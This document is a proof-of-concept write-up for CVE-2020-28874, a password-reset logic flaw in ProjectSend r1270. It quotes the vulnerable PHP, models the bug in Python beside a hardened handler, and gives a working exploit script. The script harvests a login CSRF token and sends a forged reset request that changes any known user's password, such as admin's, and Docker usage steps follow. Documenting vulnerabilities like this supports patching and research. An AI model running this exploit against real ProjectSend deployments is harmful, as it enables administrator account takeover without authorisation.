
CVE-2020-28874 PoC — ProjectSend security vulnerability

Associated vulnerability: ProjectSend security vulnerability (CVE-2020-28874)
Description: reset-password.php in ProjectSend before r1295 allows remote attackers to reset a password because of incorrect business logic. Errors are not properly considered (an invalid token parameter).

Readme
This repository contains a description of the vulnerability (CVE-2020-28874) found in the [ProjectSend](https://www.projectsend.org/yes) r1270 release.

Thank you to my colleagues from Entelgy Innotec Security for pushing me to improve!

# CVE-2020-28874: Privilege Escalation
## Description
The vulnerability is in the reset-password component: an attacker can change the password of any user whose username is known (for example `admin`) without holding a valid reset token.

This is possible because the backend populates `$user_data` from the username supplied in the query string before the token is validated, and does not clear it when the token turns out to be invalid:
```php
if (!empty($_GET['token']) && !empty($_GET['user'])) {
    $got_token = $_GET['token'];
    $got_user  = $_GET['user'];

    /**
     * Get the user's id
     */
    // $user_data is filled for any existing username, whatever the token is
    $user_data = get_user_by_username($got_user);
    // ...
}
```
The POST handler then relies on the state of that variable to decide whether to proceed with the reset. The only check it makes is that `$user_data['id']` is non-empty, which holds for any existing username:

```php
if ($_POST) {
    /**
     * Clean the posted form values.
     */
    $form_type = encode_html($_POST['form_type']);

    switch ($form_type) {
        // ...
        case 'new_password':
            // Checks only that a user record was loaded, not that the token was valid
            if (!empty($user_data['id'])) {
                $reset_password_new = $_POST['password'];
                // ...
            }
        // ...
    }
}
```
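The two snippets above elide the surrounding code, so the following Python model, added here and not taken from ProjectSend, isolates the control-flow mistake: the r1270-style handler writes the new password whenever a user record was loaded from `?user=`, while a hardened handler keeps the record only when the token matched. The in-memory user table, the `reset_token` field, and the function names are assumptions chosen for illustration, not the project's real helpers.

```python
"""Model of the reset-password.php control flow shown above.

Added example, not ProjectSend code: the in-memory store, the token
comparison and the function names are assumptions made to isolate the
logic error; the project's real helpers are not reproduced here.
"""
import secrets


def get_user_by_username(users, username):
    """Stand-in for the ProjectSend helper of the same name (assumption):
    returns the record for an existing username, None otherwise."""
    return users.get(username)


def reset_password_r1270(users, query, post):
    """Mirrors the vulnerable flow: $user_data is filled from ?user= before
    the token is checked, and a bad token only records an error."""
    errors = []
    user_data = None
    if query.get("token") and query.get("user"):
        user_data = get_user_by_username(users, query["user"])
        if user_data is None or user_data["reset_token"] != query["token"]:
            errors.append("invalid token")  # noted, but $user_data survives
    if post.get("form_type") == "new_password":
        # The only gate before writing is that a user id was loaded.
        if user_data and user_data.get("id"):
            user_data["password"] = post["password"]
            return "password_changed", errors
    return "no_change", errors


def reset_password_hardened(users, query, post):
    """Hardened flow: a user record is only kept when its reset token
    matches, and the token is consumed after use."""
    errors = []
    user_data = None
    if query.get("token") and query.get("user"):
        candidate = get_user_by_username(users, query["user"])
        if (candidate and candidate.get("reset_token")
                and secrets.compare_digest(candidate["reset_token"], query["token"])):
            user_data = candidate
        else:
            errors.append("invalid token")
    if post.get("form_type") == "new_password":
        if user_data is not None and not errors:
            user_data["password"] = post["password"]
            user_data["reset_token"] = None  # single use
            return "password_changed", errors
    return "no_change", errors


def demo():
    """Runs both flows against a constructed user table; returns the outcomes."""
    def fresh():
        # Constructed data: admin never requested a reset, so no token exists.
        return {"admin": {"id": 1, "password": "old-secret", "reset_token": None}}

    attack_query = {"token": "anything", "user": "admin"}
    attack_post = {"form_type": "new_password", "password": "newAdminP4ssword*"}

    vuln_users = fresh()
    vuln_result, _ = reset_password_r1270(vuln_users, attack_query, attack_post)

    fixed_users = fresh()
    fixed_result, _ = reset_password_hardened(fixed_users, attack_query, attack_post)

    return {
        "vulnerable": (vuln_result, vuln_users["admin"]["password"]),
        "hardened": (fixed_result, fixed_users["admin"]["password"]),
    }


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the vulnerable handler changing the admin password even though the token never matched, while the hardened handler refuses and leaves the stored password untouched.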
### Attack
To exploit this, the attacker crafts a POST request to `reset-password.php` whose query string carries an arbitrary (invalid) `token` parameter and the target username in the `user` parameter. The body must contain `form_type` set to `new_password`, `password` set to the desired new password, and a valid `csrf_token`; the reset-password form does not provide one, but the token served on the login form can be used.
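The request described above, built as an added example that is not the repository's own `CVE-2020-28874.py`. It assumes the login page is served at `/index.php`, that its hidden CSRF field is named `csrf_token` (the write-up names the field but does not show the form), and the sample login HTML is constructed for an offline dry run. Nothing is sent to a server unless `send=True` is passed.

```python
"""Builds the password-reset request described in the Attack section.

Added example, not the repository's CVE-2020-28874.py. Assumptions: the
login page lives at /index.php, its hidden CSRF field is named
csrf_token, and SAMPLE_LOGIN_HTML below is constructed, not a real
capture. Nothing is sent unless send=True.
"""
import http.cookiejar
import re
import urllib.parse
import urllib.request

# Constructed stand-in for the login form, used for the offline dry run.
SAMPLE_LOGIN_HTML = (
    '<form action="index.php" method="post">\n'
    '<input type="hidden" name="csrf_token" value="3f1c2a9b8d7e6f5a4b3c2d1e0f9a8b7c">\n'
    '<input type="text" name="username">\n'
    '</form>'
)

CSRF_RE = re.compile(r'name="csrf_token"\s+value="([^"]+)"')


def extract_csrf_token(html):
    """Pulls the hidden csrf_token value out of the login form."""
    match = CSRF_RE.search(html)
    if match is None:
        raise ValueError("login form has no csrf_token field")
    return match.group(1)


def build_reset_request(base_url, username, new_password, csrf_token, token="invalid"):
    """Returns (url, body) for the r1270 reset flow.

    The token only has to be non-empty: r1270 loads the user from ?user=
    before noticing the token is bad, so any value works."""
    query = urllib.parse.urlencode({"token": token, "user": username})
    url = base_url.rstrip("/") + "/reset-password.php?" + query
    body = urllib.parse.urlencode({
        "form_type": "new_password",
        "password": new_password,
        "csrf_token": csrf_token,
    })
    return url, body


def exploit(base_url, username, new_password, send=False):
    """Dry run by default: returns the (url, body) that would be sent.

    With send=True the login page is fetched through a cookie jar so the
    csrf_token stays bound to that session, and the crafted POST goes out
    in the same session; the HTTP status is returned."""
    base = base_url.rstrip("/")
    if not send:
        csrf = extract_csrf_token(SAMPLE_LOGIN_HTML)
        return build_reset_request(base, username, new_password, csrf)

    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    with opener.open(base + "/index.php") as resp:
        csrf = extract_csrf_token(resp.read().decode("utf-8", "replace"))
    url, body = build_reset_request(base, username, new_password, csrf)
    req = urllib.request.Request(url, data=body.encode(), method="POST")
    with opener.open(req) as resp:
        return resp.status


if __name__ == "__main__":
    print(exploit("http://localhost", "admin", "newAdminP4ssword*"))
```

The cookie jar matters: the CSRF token is tied to the session that received the login page, so fetching the token and sending the POST through separate connections would fail the CSRF check for reasons unrelated to the vulnerability.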

In this repository you can find a Python script that exploits the vulnerability and a Docker setup to test it against.
#### Usage
```sh
git clone https://github.com/varandinawer/CVE-2020-28874_CVE-2020-28875.git
cd ./CVE-2020-28874_CVE-2020-28875/docker-r1270
docker-compose up
# To finish the ProjectSend installation, open http://localhost in a browser and follow the prompts to set up an admin account
cd ..
python CVE-2020-28874.py --url http://localhost --user admin --pwd newAdminP4ssword*
```
## Fix
Upgrade to [r1295](https://www.projectsend.org/change-log/) or later.
